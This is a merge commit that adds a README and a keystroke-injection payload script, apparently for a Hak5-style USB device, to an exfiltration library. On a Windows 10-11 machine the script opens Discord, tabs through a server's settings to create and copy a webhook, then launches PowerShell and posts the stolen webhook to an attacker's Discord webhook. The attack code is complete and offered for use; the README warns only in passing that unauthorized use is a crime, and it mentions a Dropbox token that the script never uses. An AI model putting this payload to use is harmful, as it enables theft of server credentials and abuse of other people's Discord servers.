Merge pull request #174 from aleff-github/patch-41

Create And Exfiltrate A Webhook Of Discord

payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/README.md

@@ -0,0 +1,34 @@
+# Create And Exfiltrate A Webhook Of Discord
+
+This script allows you to create a Webhook of a Discord server quickly and exfiltrate it. For demonstration purposes another Discord webhook was used for exfiltration but of course any method you prefer can be used.
+
+**Category**: Exfiltration
+
+## Description
+
+This script allows you to create a Webhook of a Discord server quickly and exfiltrate it. For demonstration purposes another Discord webhook was used for exfiltration but of course any method you prefer can be used.
+
+First of all open Discord trough Windows GUI, the open time may vary depending on the pc and whether there may be updates that need to be done. When it is open, search the server using a Discord keyboard shortcut *\<server_name>, then go to first channel and open the settings using TABx11, then go to Integration settings using TABx6 and DOWN_ARROWx3, then create a Webhook (Because it may happen that there is still not even one) and copy the first reachable, then close Discord.
+
+To do the exfiltration I decided to use another discord webhook but of course you can use whatever exfiltration method you prefer.
+
+**Stealing a Discord webhook without authorization is considered a cybercrime**. Acquiring a webhook without proper permission is a violation of digital security and can be subject to legal consequences.
+
+## Dependencies
+
+* Discord Installed
+* Internet connection
+
+## Settings
+
+- You must define the Discord server name i.e. Hak5
+
+    `DEFINE SERVER_NAME example`
+
+- You must define your Dropbox accessToken or modify the exfiltration modality.
+
+    `DEFINE DROPBOX_ACCESS_TOKEN example`
+
+- The open time may vary depending on the pc and whether there may be updates that need to be done
+    
+    `DELAY 6000`

payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt

@@ -0,0 +1,76 @@
+REM ###############################################################
+REM #                                                             |
+REM # Title        : Create And Exfiltrate A Webhook Of Discord   |
+REM # Author       : Aleff                                        |
+REM # Version      : 1.0                                          |
+REM # Category     : Exfiltration                                 |
+REM # Target       : Windows 10-11                                |
+REM #                                                             |
+REM ###############################################################
+
+
+REM Requirements:
+REM     - Internet connection
+REM     - Discord Installed
+
+REM You must define the Discord server name i.e. Hak5
+DEFINE #SERVER_NAME example
+
+REM You must define your Discord webhook if you want to use this method for the exfiltration
+DEFINE #DISCORD_WEBHOOK example
+
+DEFAULT_DELAY 500
+
+REM Open Discord app
+GUI
+STRINGLN Discord
+
+REM It depends
+DELAY 6000
+
+REM Search by Discord keyboard shortcut and open it
+CTRL k
+STRING *
+STRINGLN #SERVER_NAME
+
+REM Go to first channel and open the settings
+REPEAT 11 TAB
+ENTER
+
+REM Open Integrations section
+REPEAT 6 TAB
+REPEAT 3 DOWNARROW
+ENTER
+
+REM Webhooks settings
+REPEAT 2 TAB
+ENTER
+
+REM Create Webhook
+REPEAT 3 TAB
+ENTER
+
+REM Select first Webhook
+TAB
+ENTER
+
+REM Copy Webhook
+REPEAT 5 TAB
+SPACE
+
+REM Close Discord
+ALT F4
+
+REM Open a PowerShell
+GUI r
+STRINGLN powershell
+DELAY 2000
+
+REM Exfiltration using Discord Webhook
+STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
+
+STRING $Payload = @{content = "
+CTRL v
+STRINGLN "} | ConvertTo-Json
+
+STRINGLN Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'; exit;